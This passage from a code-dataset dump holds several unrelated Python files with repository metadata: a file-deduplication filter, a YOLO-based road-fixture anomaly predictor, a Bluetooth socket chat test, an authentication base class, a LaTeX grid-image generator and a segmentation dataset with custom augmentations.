wf:\n ... wf.write(contents)\n 14\n\n >>> d = DirectoryAllFilesFilter('/tmp')\n\n >>> d.apply(contents) # False is _any_ file in /tmp contains contents\n False\n\n >>> d.apply(b'That was a test') # True otherwise\n True\n\n >>> os.remove(testfile)\n\n \"\"\"\n\n def __init__(self, directory: str):\n \"\"\"\n Args:\n directory: the directory we're watching\n \"\"\"\n self.all_md5s: Set[str] = set()\n super().__init__(directory)\n\n def _update_file(self, filename: str, mtime: Optional[float] = None):\n \"\"\"Internal method. Given a file and its mtime, update internal\n state.\n \"\"\"\n from pyutils.files import file_utils\n\n assert file_utils.does_file_exist(filename)\n if mtime is None:\n mtime = file_utils.get_file_raw_mtime(filename)\n assert mtime is not None\n if self.mtime_by_filename.get(filename, 0) != mtime:\n md5 = file_utils.get_file_md5(filename)\n self.mtime_by_filename[filename] = mtime\n self.md5_by_filename[filename] = md5\n self.all_md5s.add(md5)\n\n def apply(\n self, proposed_contents: Any, ignored_filename: Optional[str] = None\n ) -> bool:\n \"\"\"Call this before writing a new file to directory with the\n proposed_contents to be written and it will return a value that\n indicates whether the identical contents is already sitting in\n *any* file in that directory. Useful, e.g., for caching.\n\n Args:\n proposed_contents: the contents about to be persisted to\n directory\n ignored_filename: unused for now, must be None\n\n Returns:\n True if proposed contents does not yet exist in any file in\n directory or False if it does exist in some file already.\n \"\"\"\n assert ignored_filename is None\n self._update()\n mem_hash = hashlib.md5()\n mem_hash.update(proposed_contents)\n md5 = mem_hash.hexdigest()\n return md5 not in self.all_md5s\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n","repo_name":"scottgasch/pyutils","sub_path":"src/pyutils/files/directory_filter.py","file_name":"directory_filter.py","file_ext":"py","file_size_in_byte":6512,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"6423963689","text":"import cv2\n#import tensorflow as tf\n#from tensorflow import keras\nimport torch\nimport torchvision\nfrom torchvision import datasets, models, transforms\nfrom ultralytics import YOLO\nfrom PIL import Image\nimport numpy as np\nimport os\n#import subprocess\n\nclass ScoringService(object):\n @classmethod\n def get_model(cls, model_path):\n \"\"\"Get model method\n\n Args:\n model_path (str): Path to the trained model directory.\n\n Returns:\n bool: The return value. True for success.\n \"\"\"\n \n \n cls.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n #print(device)\n\n anomaly_models={}\n for category in [\"line\",\"sign\",\"light\"]:\n anomaly_models[category] = torch.load(os.path.join(model_path,f\"{category}.pth\")).to(cls.device)\n \n \"\"\"\n anomaly_models={}\n for category in [\"line\",\"sign\",\"light\"]:\n anomaly_models[category] = keras.models.load_model(os.path.join(model_path,f\"{category}_best.h5\"))\n \"\"\"\n cls.anomaly_models=anomaly_models\n\n cls.softmax = torch.nn.Softmax(dim=1)\n cls.data_transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n\n cls.yolo_model=YOLO(os.path.join(model_path,\"best.pt\"))\n \n return True\n\n\n @classmethod\n def predict(cls, input):\n \"\"\"Predict method\n\n Args:\n input: Data of the sample you want to make inference from (str)\n\n Returns:\n list: Inference for the given input.\n\n \"\"\"\n prediction = []\n cap = cv2.VideoCapture(input)\n frame_id = 0\n anomaly_label=['その他', '補修不要', '要補修']\n yolo_label=[\"line\",\"sign\",\"light\"]\n\n while True:\n ret, frame = cap.read()\n if ret:\n category_bool={n:0 for n in [\"line\",\"sign\",\"light\"]}\n im=Image.fromarray(frame)\n results=cls.yolo_model(source=im)\n for result in results[0].boxes:\n box=result.xyxy.tolist()[0]\n #conf=float(result.conf)\n cls_name=yolo_label[int(result.cls)]\n #print(box,conf,cls_name)\n #if (conf>0.2) and (category_bool[cls_name]==0):\n if (category_bool[cls_name]==0):\n crop_img=im.crop((box[0],box[1],box[2],box[3])).resize((224, 224))\n crop_img=cls.data_transform(crop_img)\n #pred=cls.anomaly_models[cls_name].predict(crop_img)\n pred=cls.anomaly_models[cls_name](crop_img.unsqueeze(dim=0).to(cls.device))\n pred=cls.softmax(pred)\n pred_label=anomaly_label[torch.argmax(pred)]\n #print(pred_label,pred)\n category_bool[cls_name]=1 if (pred_label=='要補修')and bool(pred[0][2]>0.8) else 0\n #print(category_bool)\n prediction.append({'frame_id':frame_id, 'line': category_bool[\"line\"], 'sign': category_bool[\"sign\"], 'light': category_bool[\"light\"]})\n \n frame_id += 1\n else:\n break\n \n \n \n\n return prediction","repo_name":"ryosuzaki/signate_2022","sub_path":"ワールドAI/sample_submit/src/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39988912129","text":"import socket\n\nADRESSE_MAC = \"88:83:5d:fd:7a:af\"\nPORT = 1\nDATA_SIZE = 1024\n\nserver = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)\nserver.bind((ADRESSE_MAC, PORT))\nserver.listen(1)\n\ntry:\n print('Ecoute des connexions...')\n client, address = server.accept()\n print(\"Connectee a {}\".format(address))\n\n while True:\n data = client.recv(DATA_SIZE)\n if not data:\n break\n print(\"Message : {}\".format(data.decode('utf-8')))\n message = input(\"Entrer un message : \")\n client.send(message.encode('utf-8'))\nexcept OSError as error:\n print(\"ERROR : \", error)\n\nfinally:\n client.close()\n server.close()","repo_name":"lionel-nyamsi/PFE_2023","sub_path":"RaspberryPiApp_Ok/src/test_com.py","file_name":"test_com.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31765237810","text":"#!/usr/bin/env python3\r\n\"\"\"Create a class to handle authentication\"\"\"\r\n\r\nfrom typing import List, TypeVar, Union\r\nimport re\r\n\r\n\r\nclass Auth:\r\n \"\"\"A class to handle authentication APIs\"\"\"\r\n\r\n def require_auth(self, path: str,\r\n excluded_paths: List[str]) -> bool:\r\n \"\"\"\r\n Check if auth is needed\r\n :param path: str\r\n :param excluded_paths: List[str]\r\n :return: bool = False for now\r\n \"\"\"\r\n if path is None or excluded_paths is None or excluded_paths == []:\r\n return True\r\n if path[-1] != '/':\r\n path = path + '/'\r\n for excluded_path in excluded_paths:\r\n if excluded_path[-1] == '*':\r\n pat = excluded_path.split('*')\r\n pat = pat[0] + '.*'\r\n match = re.search(pat, path)\r\n if match:\r\n return False\r\n if path not in excluded_paths:\r\n return True\r\n else:\r\n return False\r\n\r\n def authorization_header(self, request=None) -> Union[str, None]:\r\n \"\"\"\r\n Provide a way to extract the authourization header\r\n :param request: object = flask request\r\n :return: str | None = None for now\r\n \"\"\"\r\n if request is None:\r\n return None\r\n elif request.headers.get(\"Authorization\"):\r\n return request.headers.get(\"Authorization\")\r\n else:\r\n return None\r\n\r\n def current_user(self, request=None) -> TypeVar('User'):\r\n \"\"\"\r\n Retrieves the current user's data\r\n :param request:\r\n :return:\r\n \"\"\"\r\n return None\r\n","repo_name":"chibuezeorjinta/alx-backend-user-data","sub_path":"0x01-Basic_authentication/api/v1/auth/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9643960873","text":"import json\nimport os\n\n\nMACROS = \"macros_task.txt\"\n\ndef get_macros(macros_file = MACROS):\n script_dir = os.path.dirname(__file__) # <-- absolute dir the script is in\n rel_path = macros_file\n abs_file_path = os.path.join(script_dir, rel_path)\n with open(abs_file_path, 'r') as f:\n data = f.read()\n return data\n\n\n\n\ndef parse_task_file(task_file:str):\n with open(task_file, 'r') as f:\n data = f.read()\n\n task_type = data.split('\\n', 1)[0].split('\\t')[1]\n gridsz = eval(data.split('\\n', 2)[1].split('\\t')[1])\n\n ## read the next gridsz lines\n\n if task_type == 'karel':\n grid = data.split('\\n', gridsz[0] + 3 + gridsz[0] + 7)\n else:\n grid = data.split('\\n', gridsz[0] + 6)\n\n ## first line of grid\n grid_headings = grid[3].split('\\t')\n if('pregrid' not in grid_headings):\n print(\"Task doesn't contain pregrid.\")\n return None\n grid_mat = []\n for ele in grid[5:5+gridsz[0]-2]:\n row = ele.split('\\t')[2:gridsz[0]]\n grid_mat.append(row)\n\n\n ## agentloc, dir\n agent_loc = eval(grid[gridsz[0] + 4].split('\\t')[1])\n agent_loc = (agent_loc[0]-2, agent_loc[1]-2)\n agent_dir = grid[gridsz[0] + 5].split('\\t')[1]\n\n\n\n\n ## if task-type is karel, will have to return the post grid and agent loc\n if task_type == 'karel':\n post_grid_title = grid[gridsz[0] + 7].split('\\t')\n if('postgrid' not in post_grid_title):\n print(\"Task doesn't contain the postgrid\")\n return None\n post_grid_mat = []\n for ele in grid[gridsz[0] + 9:9 + gridsz[0] + gridsz[0] - 2]:\n row = ele.split('\\t')[2:gridsz[0]]\n post_grid_mat.append(row)\n\n ## final agentloc, dir\n post_agent_loc = eval(grid[gridsz[0] + 3 + gridsz[0] + 5].split('\\t')[1])\n post_agent_loc = (post_agent_loc[0] - 2, post_agent_loc[1] - 2)\n post_agent_dir = grid[gridsz[0] + 3 + gridsz[0] + 6].split('\\t')[1]\n\n\n if task_type == 'karel':\n return task_type, [agent_loc,post_agent_loc], [agent_dir,post_agent_dir] , [grid_mat, post_grid_mat]\n\n return task_type, [agent_loc], [agent_dir], [grid_mat]\n\n\n\n\ndef gen_latex_script(type:str, agent_loc: tuple, agent_dir: tuple, grid_mat:tuple, macros_file=MACROS):\n macros = get_macros(macros_file)\n\n ### beginning script\n begin_script = \"\\n\\\\begin{document}\\n\" \\\n \"\\\\tikzset{\\n\" \\\n \"box/.style={\" \\\n \"rectangle, draw=black, minimum size=0.25cm}\" \\\n \"}\\n\" \\\n \"\\centering\\n\" \\\n \"\\\\begin{tikzpicture}[\\n\" \\\n \"box/.style={rectangle,draw=black,minimum size=0.25cm\" \\\n \"}\\n]\" \\\n \"\\n%%%%% GRID\\n\"\n ### ending script\n if type == 'hoc':\n end_script = \"\\draw[draw=black, thick] (-0.15,-0.15) rectangle (2.40,2.40);\\n\" \\\n \"\\end{tikzpicture}\\n\" \\\n \"\\end{document}\"\n elif type == 'karel':\n end_script = \"\\draw[draw=black, thick] (-0.15,-0.15) rectangle (2.40,2.40);\\n\" \\\n \"\\draw[draw=black, thick] (2.6,-0.15) rectangle (5.15,2.4);\\n\"\\\n \"%%%%% adding the transition arrow\\n\"\\\n \"\\draw[-{Latex[scale=1.0]}] (2.4, 1.15) -- (2.6,1.15);\\n\"\\\n \"\\end{tikzpicture}\\n\" \\\n \"\\end{document}\"\n else:\n print(\"Unknown task type encountered\")\n return None\n\n\n ### create the task-grid with colors\n all_grid_colors = []\n y_max = len(grid_mat[0])-1\n grid_color = []\n goal_flag = False\n for ridx, row in enumerate(grid_mat[0]):\n for cidx, cell in enumerate(row):\n if(cell == '#'):\n grid_color.append('\\\\node[box, fill=gray!40] at '+str((cidx*0.25, (y_max-ridx)*0.25))+\"{};\\n\")\n elif(cell == '.'):\n grid_color.append('\\\\node[box, fill=white] at ' + str((cidx * 0.25, (y_max - ridx) * 0.25)) + \"{};\\n\")\n elif(cell == \"+\"):\n goal_flag = True\n goal_grid = '\\\\node[draw, fill=red, star, star points=5, inner sep=0pt, minimum size=6pt] at '+str((cidx * 0.25, (y_max - ridx) * 0.25))+\"{};\\n\"\n grid_color.append(goal_grid)\n elif (cell == 'x'):\n if type == 'hoc':\n goal_flag = True\n goal_grid = '\\\\node[draw, fill=red, star, star points=5, inner sep=0pt, minimum size=6pt] at ' + str(\n (cidx * 0.25, (y_max - ridx) * 0.25)) + \"{};\\n\"\n grid_color.append(goal_grid)\n else:\n grid_color.append(\n '\\\\node[box, fill=white] at ' + str((cidx * 0.25, (y_max - ridx) * 0.25)) + \"{};\\n\")\n grid_color.append(\n '\\\\node[draw, fill=yellow, diamond, inner sep=1.75pt,minimum size=0.75pt] at' + str(\n (cidx * 0.25, (y_max - ridx) * 0.25)) + \"{};\\n\"\n )\n else:\n continue\n\n # add the goal state sign for HOC-tasks if not added\n if type == 'hoc' and not goal_flag:\n goal_grid = '\\\\node[draw, fill=red, star, star points=5, inner sep=0pt, minimum size=6pt] at ' + str(\n (agent_loc[1][0] * 0.25, (y_max - agent_loc[1][1]) * 0.25)) + \"{};\\n\"\n grid_color.append(goal_grid)\n\n all_grid_colors.append(grid_color)\n\n if agent_dir[0] == \"east\":\n dart_dir = 0\n elif agent_dir[0] == \"north\":\n dart_dir = 90\n elif agent_dir[0] == \"south\":\n dart_dir = -90\n else:\n dart_dir = 180\n\n all_agents_pos = []\n all_agents_pos.append(\"\\\\node[draw, fill=blue!50, dart, rotate=\"+str(dart_dir)+\" ,inner sep=0.01pt, minimum size=4.4pt] at \"+str((agent_loc[0][0]* 0.25, (y_max - agent_loc[0][1]) * 0.25))+\"{};\\n\")\n\n ## If task type is karel, add additional post grid code\n if type == 'karel':\n postgridscript = \"\\n%%%%% POSTGRID\\n\" \\\n \"[\\nbox/.style={rectangle,draw=black,minimum size=0.25cm\" \\\n \"}\\n]\"\n ### create the task-grid with colors\n y_max = len(grid_mat[1]) - 1\n grid_color = []\n for ridx, row in enumerate(grid_mat[1]):\n for cidx, cell in enumerate(row):\n if (cell == '#'):\n grid_color.append(\n '\\\\node[box, fill=gray!40] at ' + str(((cidx * 0.25)+2.75, (y_max - ridx) * 0.25)) + \"{};\\n\")\n elif (cell == '.'):\n grid_color.append(\n '\\\\node[box, fill=white] at ' + str(((cidx * 0.25)+2.75, (y_max - ridx) * 0.25)) + \"{};\\n\")\n elif (cell == \"+\"):\n goal_grid = '\\\\node[draw, fill=red, star, star points=5, inner sep=0pt, minimum size=6pt] at ' + str(\n ((cidx * 0.25)+2.75, (y_max - ridx) * 0.25)) + \"{};\\n\"\n grid_color.append(goal_grid)\n elif (cell == 'x'):\n grid_color.append(\n '\\\\node[box, fill=white] at ' + str(((cidx * 0.25)+2.75, (y_max - ridx) * 0.25)) + \"{};\\n\")\n grid_color.append(\n '\\\\node[draw, fill=yellow, diamond, inner sep=1.75pt,minimum size=0.75pt] at' + str(\n ((cidx * 0.25)+2.75, (y_max - ridx) * 0.25)) + \"{};\\n\")\n else:\n continue\n\n all_grid_colors.append(grid_color)\n if agent_dir[1] == \"east\":\n dart_dir = 0\n elif agent_dir[1] == \"north\":\n dart_dir = 90\n elif agent_dir[1] == \"south\":\n dart_dir = -90\n else:\n dart_dir = 180\n\n all_agents_pos.append(\"\\\\node[draw, fill=blue!50, dart, rotate=\" + str(\n dart_dir) + \" ,inner sep=0.01pt, minimum size=4.4pt] at \" + str(\n ((agent_loc[1][0] * 0.25)+2.75, (y_max - agent_loc[1][1]) * 0.25)) + \"{};\\n\")\n\n\n ### combine the whole script\n script = macros + begin_script\n for ele in all_grid_colors[0]: # pregrid\n script = script + ele\n script = script + all_agents_pos[0] # pre-agent pos\n for ele in all_grid_colors[1]: # post grid\n script = script + ele\n script = script + all_agents_pos[1] + end_script # post-agent pos\n return script\n\n\n\n ### combine the whole script\n script = macros+ begin_script\n for ele in all_grid_colors[0]:\n script = script + ele\n script = script + all_agents_pos[0] + end_script\n\n return script\n\ndef gen_task_script(task_file, macros_file = MACROS):\n\n type, loc, dir, mat = parse_task_file(task_file)\n script = gen_latex_script(type, loc, dir, mat, macros_file)\n\n return script\n\n\ndef get_task_image(taskfile:str, taskfolder:str, taskimg: str):\n\n task_script = gen_task_script(taskfile)\n with open(taskfolder + '/' + taskimg + '.tex', 'w') as fp:\n fp.write(\"%s\" % task_script)\n\n # generate the image file\n input_path = taskfolder + '/' + taskimg + '.tex'\n os_cmd = \"pdflatex -interaction=nonstopmode -output-directory \" + taskfolder + \" %s\"\n os.system(os_cmd % (input_path))\n output_path = taskfolder + \"/\" + taskimg + '.jpg'\n os_cmd = \"convert -density 1200 -quality 100 \" + taskfolder + \"/\" + taskimg + \".pdf %s\"\n os.system(os_cmd % (output_path))\n\n print(\"Generated task image\")\n return 0\n\n\n","repo_name":"machine-teaching-group/aied2022_pquizsyn","sub_path":"code/utils/gen_task_image.py","file_name":"gen_task_image.py","file_ext":"py","file_size_in_byte":9382,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"20807221466","text":"import os\nimport cv2\nimport glob\nimport json\nimport random\nimport warnings\n\nimport numpy as np\nimport albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nfrom torch.utils.data import Dataset, DataLoader\nfrom albumentations import ImageOnlyTransform\n\nwarnings.filterwarnings(\"ignore\")\n\nclass InhomogenousColorAug(ImageOnlyTransform):\n def __init__(self, \n always_apply: bool = True, \n p: float = 1.0, \n max_pixel_detla=80.,\n aug_offline_path=\"database\"):\n self.detla_files = glob.glob(os.path.join(aug_offline_path, \"*.npy\"))\n self.detla_infos = {\n \"detla_file\": self.detla_files[0],\n \"count\": 0,\n }\n self.max_pixel_detla = max_pixel_detla\n self.count = 1\n super(InhomogenousColorAug, self).__init__(always_apply, p)\n \n def adjust_gamma(self, image, gamma=1.0):\n brighter_image = np.array(np.power((image / 255.), \n gamma[:, :, None]) * 255, dtype=np.uint8)\n return brighter_image\n\n def apply(self, image, **params):\n if self.count % 10 == 0:\n idx = int(len(self.detla_files) * random.random())\n detla_file = self.detla_files[idx]\n self.detla_infos[\"detla_file\"] = detla_file\n detla_offsets = np.load(self.detla_infos[\"detla_file\"])\n self.detla_infos[\"detla_offsets\"]= detla_offsets\n if \"detla_offsets\" in self.detla_infos:\n detla_offsets = self.detla_infos[\"detla_offsets\"]\n else:\n detla_offsets = np.load(self.detla_infos[\"detla_file\"])\n self.detla_infos[\"detla_offsets\"]= detla_offsets\n # print(\"detla_file: \", self.detla_infos[\"detla_file\"]) \n self.count += 1\n src_h, src_w = image.shape[:2]\n dh, dw = detla_offsets.shape\n cropped_h = dh * (random.randint(70, 100) / 100.)\n cropped_w = dw * (random.randint(70, 100) / 100.)\n \n y_pos = max(0, int(random.random() * (dh - cropped_h - 2)))\n ty = int(y_pos + cropped_h) \n x_pos = max(0, int(random.random() * (dw - cropped_w - 2)))\n tx = int(x_pos + cropped_w) \n crop_detla = detla_offsets[y_pos : ty, x_pos : tx]\n crop_detla = cv2.resize(crop_detla, (src_w, src_h))\n color_detla = crop_detla * self.max_pixel_detla\n if random.random() < 0.3:\n color_detla = -1. * color_detla\n # cv2.imwrite(\"detla.png\", 255 * (color_detla - color_detla.min()) / (color_detla.max() - color_detla.min()))\n # if random.random() < 0.5: \n # color_detla = np.rot90(color_detla)\n if random.random() < 0.5:\n if random.random() < 0.5:\n color_detla = color_detla[::-1, :]\n else:\n color_detla = color_detla[:, ::-1]\n return self.adjust_gamma(image, (color_detla + 1.5) ** 1.2)\n # image_tmp = image.copy()\n # image_tmp = np.transpose(image.copy(), (2, 0, 1)).astype(np.float32)\n # img_aug = image.astype(np.float32) + color_detla[:, :, None]\n # return img_aug.clip(0, 255).astype(np.uint8)\n # return np.transpose(img_aug.clip(0, 255), (1, 2, 0)).astype(np.uint8)\n \nclass InhomogenousOffsetAug(ImageOnlyTransform):\n def __init__(self, \n always_apply: bool = True, \n p: float = 1.0, \n target_size=256, \n offset_val=80., \n curve_period=1200.):\n # self.target_size = target_size\n self.offset_val = offset_val\n self.curve_period = curve_period\n self.line_length = 1200\n # self.detla_x = np.arange(0, self.target_size)[None, :].repeat(self.target_size, 0).astype(np.float32)\n # self.detla_y = np.arange(0, self.target_size)[:, None].repeat(self.target_size, 1).astype(np.float32) \n super(InhomogenousOffsetAug, self).__init__(always_apply, p)\n\n def apply(self, image, **params):\n src_h, src_w = image.shape[:2]\n detla_x = np.arange(0, src_w)[None, :].repeat(src_h, 0).astype(np.float32)\n detla_y = np.arange(0, src_h)[:, None].repeat(src_w, 1).astype(np.float32) \n offset_val = (self.offset_val + 15. * (random.random() - 0.5) * 2.)\n curve_period = (self.curve_period + 200. * (random.random() - 0.5) * 2.)\n offset = offset_val * np.sin(2 * np.pi * \\\n np.arange(0, self.line_length) / curve_period)\n if random.random() < 0.5:\n pose_idx = max(0, int((self.line_length - src_w - 2) * random.random()))\n cropped_offset = offset[pose_idx : pose_idx + src_w]\n crop_detla_x = detla_x + cropped_offset\n crop_detla_y = detla_y\n else:\n pose_idx = max(0, int((self.line_length - src_h - 2) * random.random()))\n cropped_offset = offset[pose_idx : pose_idx + src_h] \n crop_detla_x = detla_x\n crop_detla_y = detla_y + cropped_offset[:, None]\n image_aug = cv2.remap(image.astype(np.float32),\n crop_detla_x.astype(np.float32),\n crop_detla_y.astype(np.float32),\n cv2.INTER_NEAREST,\n borderMode=cv2.BORDER_DEFAULT,\n borderValue=0).astype(np.uint8) \n return image_aug\n \nclass ImageDataset(Dataset):\n def __init__(self, \n cfg, \n roots, \n mode='train', \n train_size=(544, 960), \n crop_size=(512, 512),\n weak_aug=False,\n scale=(0.99, 1.01),\n semi_training=False,\n add_adeptive_noise=False,\n focus_add_adeptive_noise=False,\n max_pixel_detla=90.,\n sup_color_aug_probs=0.1,\n sup_offset_aug_probs=0.2, \n aug_offline_path=\"./database/zerowaste/detla_offsets\", \n ):\n self.cfg = cfg\n self.mode = mode\n self.scale = scale\n self.semi_training = semi_training\n self.crop_size = crop_size\n self.train_size = train_size\n self.add_adeptive_noise = add_adeptive_noise\n self.focus_add_adeptive_noise = focus_add_adeptive_noise\n self.max_pixel_detla = max_pixel_detla\n self.sup_color_aug_probs = sup_color_aug_probs\n self.sup_offset_aug_probs = sup_offset_aug_probs\n self.aug_offline_path = aug_offline_path\n self.gts = []\n self.images = []\n self.dataset_lens = []\n self.base_path = \"/root/autodl-tmp/zerowaste_database_resized\"\n for root in roots:\n if mode == 'train':\n with open(os.path.join(root, \"{}.json\".format(mode)), \"r\") as f:\n train_images = json.load(f)\n random.shuffle(train_images)\n _images = sorted(\n [os.path.join(self.base_path, mode, \"data\", train_image) for train_image in train_images])\n _gts = sorted([_image.replace(\"/data/\", \"/sem_seg/\") for _image in _images])\n if weak_aug:\n self.transform = self.get_weak_augmentation()\n else:\n self.transform = self.get_augmentation()\n elif mode == 'test':\n with open(os.path.join(root, \"{}.json\".format(mode)), \"r\") as f:\n test_images = json.load(f)\n _images = sorted([os.path.join(self.base_path, mode, \"data\", test_image) for test_image in test_images])\n _gts = sorted([_image.replace(\"/data/\", \"/sem_seg/\") for _image in _images])\n self.transform = A.Compose([\n A.Resize(self.train_size[0], self.train_size[1], interpolation=cv2.INTER_NEAREST), \n # A.Resize(train_size, train_size, interpolation=cv2.INTER_NEAREST), \n ])\n elif mode == 'unlabeled':\n with open(os.path.join(root, \"train_mini_{}.json\".format(mode)), 'r') as f:\n unlabeled_train_images = json.load(f)\n _images = sorted(\n [os.path.join(self.base_path, \"zerowaste-s-parts\", \"data\", unlabeled_train_image) for unlabeled_train_image in unlabeled_train_images])\n _gts = sorted([_image for _image in _images])\n # _gts = sorted([_image.replace(\"/images/\", \"/masks/\") for _image in _images])\n if weak_aug:\n self.transform = self.get_weak_augmentation()\n else:\n self.transform = self.get_augmentation()\n else:\n raise KeyError('MODE ERROR: {}'.format(mode))\n \n self.images += _images\n self.gts += _gts\n self.dataset_lens.append(len(self.images))\n # self.filter_files()\n self.size = len(self.images)\n self.to_tensors = A.Compose([A.Normalize(), ToTensorV2()])\n self.offset_aug = A.Compose([InhomogenousOffsetAug(\n offset_val=cfg.DATA.OFFSET_VALUE,\n curve_period=cfg.DATA.CURVE_PERIOD,\n )])\n self.color_aug = A.Compose([\n InhomogenousColorAug(p=1.0, \n max_pixel_detla=max_pixel_detla, \n aug_offline_path=aug_offline_path),\n # A.RGBShift(r_shift_limit=25, g_shift_limit=25, b_shift_limit=25, p=0.5),\n # A.RandomBrightnessContrast(p=0.2), \n ])\n\n def __len__(self):\n return self.size\n\n def lens(self):\n return self.dataset_lens\n\n def __getitem__(self, index):\n src_image = cv2.imread(self.images[index])\n image = cv2.cvtColor(src_image, cv2.COLOR_BGR2RGB)\n seg_mask = cv2.imread(self.gts[index], cv2.IMREAD_GRAYSCALE)\n # seg_mask[seg_mask < 128] = 0\n # seg_mask[seg_mask >= 128] = 1\n # assert seg_mask.max() == 1 or seg_mask.max() == 0\n data_np = self.transform(image=image, mask=seg_mask)\n wo_aug_image = data_np[\"image\"]\n wo_aug_mask = data_np[\"mask\"]\n if random.random() < self.sup_offset_aug_probs:\n # cv2.imwrite(\"aug_f/{}_src1.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_image)\n # cv2.imwrite(\"aug_f/{}_msk1.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_mask*255)\n cat_aug_image = self.offset_aug(\n image=np.concatenate((wo_aug_image, wo_aug_mask[:, :, None]), -1))[\"image\"]\n wo_aug_image = cat_aug_image[:, :, :3]\n wo_aug_mask = cat_aug_image[:, :, -1]\n # cv2.imwrite(\"aug_f/{}_src2.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_image)\n # cv2.imwrite(\"aug_f/{}_msk2.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_mask*255)\n if self.focus_add_adeptive_noise:\n aug_image = self.color_aug(image=wo_aug_image)[\"image\"]\n # cv2.imwrite(\"aug_c/{}_src1.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_image)\n # cv2.imwrite(\"aug_c/{}_src2.jpg\".format(os.path.basename(self.images[index])[:-4]), aug_image)\n # cv2.imwrite(\"aug_c/{}_msk1.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_mask*255) \n else:\n if not self.add_adeptive_noise:\n aug_image = wo_aug_image\n else:\n if random.random() < self.sup_color_aug_probs:\n aug_image = self.color_aug(image=wo_aug_image)[\"image\"]\n # cv2.imwrite(\"aug_c/{}_src1.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_image)\n # cv2.imwrite(\"aug_c/{}_src2.jpg\".format(os.path.basename(self.images[index])[:-4]), aug_image)\n # cv2.imwrite(\"aug_c/{}_msk1.jpg\".format(os.path.basename(self.images[index])[:-4]), wo_aug_mask*255)\n else:\n aug_image = wo_aug_image\n \n data_tensor = self.to_tensors(\n image=aug_image,\n mask=wo_aug_mask,\n )\n wo_aug_data_tensor = self.to_tensors(\n image=wo_aug_image,\n )\n data = {'imidx': index, \n 'path': self.images[index], \n 'image': data_tensor['image'], \n 'wo_aug_image': wo_aug_data_tensor['image'], \n 'seg_mask': data_tensor['mask'],\n }\n return data\n\n def filter_files(self):\n assert len(self.images) == len(self.gts)\n for img_path, gt_path in zip(self.images, self.gts):\n img = cv2.imread(img_path)\n gt = cv2.imread(gt_path)\n # assert gt.max() == 255\n assert gt.min() == 0\n # assert img.shape == gt.shape\n assert img_path.split('/')[-1].split('.')[0].split('_')[0] == \\\n gt_path.split('/')[-1].split('.')[0].split('_')[0], (img_path, gt_path)\n\n def get_augmentation(self):\n return A.Compose([\n A.Resize(self.train_size + 64, self.train_size + 64, \n interpolation=cv2.INTER_NEAREST),\n A.HorizontalFlip(),\n A.VerticalFlip(),\n A.RandomRotate90(),\n A.ShiftScaleRotate(shift_limit=0.2, scale_limit=0.2, rotate_limit=30, p=0.5),\n A.RGBShift(r_shift_limit=25, g_shift_limit=25, b_shift_limit=25, p=0.5),\n A.RandomBrightnessContrast(p=0.2),\n A.RandomSizedCrop(min_max_height=(self.crop_size, self.train_size + 32),\n height=self.train_size, width=self.train_size,\n w2h_ratio=1.0, interpolation=cv2.INTER_NEAREST, p=0.8),\n A.Resize(self.train_size, self.train_size, interpolation=cv2.INTER_NEAREST)\n ])\n\n def get_weak_augmentation(self):\n return A.Compose([\n A.HorizontalFlip(p=0.2),\n A.VerticalFlip(p=0.2),\n # A.RandomRotate90(p=0.2),\n A.Resize(self.train_size[0], self.train_size[1], \n interpolation=cv2.INTER_NEAREST), \n A.RandomCrop(self.crop_size[0], self.crop_size[1]), \n ])\n\ndef get_dataset(mode, \n cfg, \n train_size=(544, 960),\n crop_size=512, \n scale=(0.75, 1), \n weak_aug=False,\n semi_training=False,\n add_adeptive_noise=False,\n focus_add_adeptive_noise=False,\n max_pixel_detla=40.,\n sup_color_aug_probs=0.1,\n sup_offset_aug_probs=0.1, \n aug_offline_path=\"./database/zerowaste/detla_offsets\", \n ):\n data_root = []\n if \"zerowaste\" in cfg.DATA.NAME:\n data_root.append(os.path.join(cfg.DIRS.DATA, 'zerowaste'))\n \n if mode == 'train':\n dts = ImageDataset(cfg=cfg, \n roots=data_root, \n mode=mode,\n train_size=train_size, \n crop_size=crop_size, \n scale=scale,\n weak_aug=weak_aug,\n semi_training=semi_training,\n add_adeptive_noise=add_adeptive_noise,\n max_pixel_detla=max_pixel_detla,\n sup_color_aug_probs=sup_color_aug_probs,\n sup_offset_aug_probs=sup_offset_aug_probs,\n aug_offline_path=aug_offline_path,\n )\n dataloader = DataLoader(dts, \n shuffle=True,\n batch_size=cfg.TRAIN.BATCH_SIZE,\n num_workers=cfg.SYSTEM.NUM_WORKERS, \n pin_memory=True, \n drop_last=True,\n # worker_init_fn=worker_init_fn,\n )\n elif mode == 'train_mini':\n dts = ImageDataset(cfg=cfg, \n roots=data_root, \n mode=mode, \n train_size=train_size,\n crop_size=crop_size, \n scale=scale,\n weak_aug=weak_aug,\n semi_training=semi_training,\n add_adeptive_noise=add_adeptive_noise,\n max_pixel_detla=max_pixel_detla,\n sup_color_aug_probs=sup_color_aug_probs,\n sup_offset_aug_probs=sup_offset_aug_probs,\n aug_offline_path=aug_offline_path,\n )\n dataloader = DataLoader(dts, \n shuffle=True,\n batch_size=cfg.TRAIN.BATCH_SIZE,\n 